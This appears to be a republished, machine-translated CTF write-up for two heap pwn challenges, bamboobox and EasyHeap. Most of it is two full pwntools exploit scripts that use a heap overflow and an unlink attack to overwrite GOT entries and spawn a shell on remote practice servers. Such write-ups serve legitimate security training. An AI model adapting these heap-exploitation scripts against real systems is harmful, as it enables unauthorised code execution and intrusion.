【pwn】 hitcontrain_bamboobox && ZJCTF_19_EasyHeap

Language 2020-03-06 15:39:47 views: null

These two topics are similar in writing together.
Routine inspection
Here Insert Picture Description
no pie, got table writable.
Program logic
edit functions heap overflows exist, the stack pointer stored in the bss section, can read and write table got through unlink. Originally both programs exist back door, but when oj deployment path a little problem, so just try to get shell.
bamboobox exist show function, can leak libc address.
easyheap just present in the program system function.

bamboobox

from pwn import *

io=remote('node3.buuoj.cn',28140)

def add(size,data):
    io.recvuntil('choice:')
    io.sendline('2')
    io.recvuntil('name:')
    io.sendline(str(size))
    io.recvuntil('item:')
    io.send(data)

def free(idx):
    io.recvuntil('choice:')
    io.sendline('4')
    io.recvuntil('index of item:')
    io.sendline(str(idx))

def edit(idx,size,data):
    io.recvuntil('choice:')
    io.sendline('3')
    io.recvuntil('of item:')
    io.sendline(str(idx))
    io.recvuntil('item name:')
    io.sendline(str(size))
    io.recvuntil('the item:')
    io.send(data)

def show():
    io.recvuntil('choice:')
    io.sendline('1')   

ptr=0x6020d8
puts_got=0x602020
free_got=0x602018

add(0x30,'a')#0
add(0x30,'a')#1
add(0x80,'b')#2
add(0x80,'/bin/sh')#3

edit(1,0x100,p64(0)+p64(0x31)+p64(ptr-0x18)+p64(ptr-0x10)+'a'*0x10+p64(0x30)+p64(0x90))
free(2)
edit(1,0x100,p64(0x30)+p64(puts_got))#1
show()
io.recvuntil('0 : ')
puts_add=u64(io.recv(6).ljust(8,'\x00'))
print(hex(puts_add))
sys=puts_add-0x2a300

edit(1,0x100,p64(0x30)+p64(free_got))
edit(0,0x100,p64(sys))
free(3)

io.interactive()

EasyHeap

from pwn import *

io=remote('node3.buuoj.cn',25111)

def add(size,data):
    io.recvuntil('choice :')
    io.sendline('1')
    io.recvuntil('Heap : ')
    io.sendline(str(size))
    io.recvuntil('heap:')
    io.send(data)

def edit(idx,size,data):
    io.recvuntil('choice :')
    io.sendline('2')
    io.recvuntil('Index :')
    io.sendline(str(idx))
    io.recvuntil('Heap : ')
    io.sendline(str(size))
    io.recvuntil('heap :')
    io.send(data)

def free(idx):
    io.recvuntil('choice :')
    io.sendline('3')
    io.recvuntil('Index :')
    io.sendline(str(idx))


free_got=0x0602018
sys_plt=0x0400700

ptr=0x6020E0+0x10

add(0x30,'a')#0
add(0x30,'b')#1
add(0x30,'c')#2
add(0x80,'d')#3
add(0x60,'/bin/sh')#4

edit(2,0x100,p64(0)+p64(0x31)+p64(ptr-0x18)+p64(ptr-0x10)+'a'*0x10+p64(0x30)+p64(0x90))
free(3)
edit(2,0x100,p64(free_got)*2)
edit(0,0x100,p64(sys_plt))
free(4)

io.interactive()
Yudhui
Published 91 original articles · won praise 11 · views 30000 +
Private letter concerns

Guess you like

Origin blog.csdn.net/github_36788573/article/details/104696070
pwn
Recommended
NetBSD bans submission of code generated by AI
Ranking
Talk dubbo of LRUCache
Chapter 1 Learning Summary
Introduction to Virtualization
pytorch 调用lstm
Six modules
[8086] The natural number of 1 to 36 into a 6x6 two-dimensional array of line-sequentially, and then print out the lower left half of the triangular array
mybatis mapper mapping file $ # {} {} understanding and
C language input and output buffer
c language floating-point input and output
andorid P version compatible, refer to Huawei
Daily
More
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)

Code World

© 2018 codetd.com